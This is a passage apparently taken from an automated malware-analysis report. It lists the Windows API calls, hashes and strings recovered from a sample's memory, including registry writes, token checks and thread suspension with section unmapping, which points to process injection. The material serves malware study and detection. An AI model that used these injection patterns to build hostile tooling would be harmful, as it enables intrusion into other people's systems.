    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
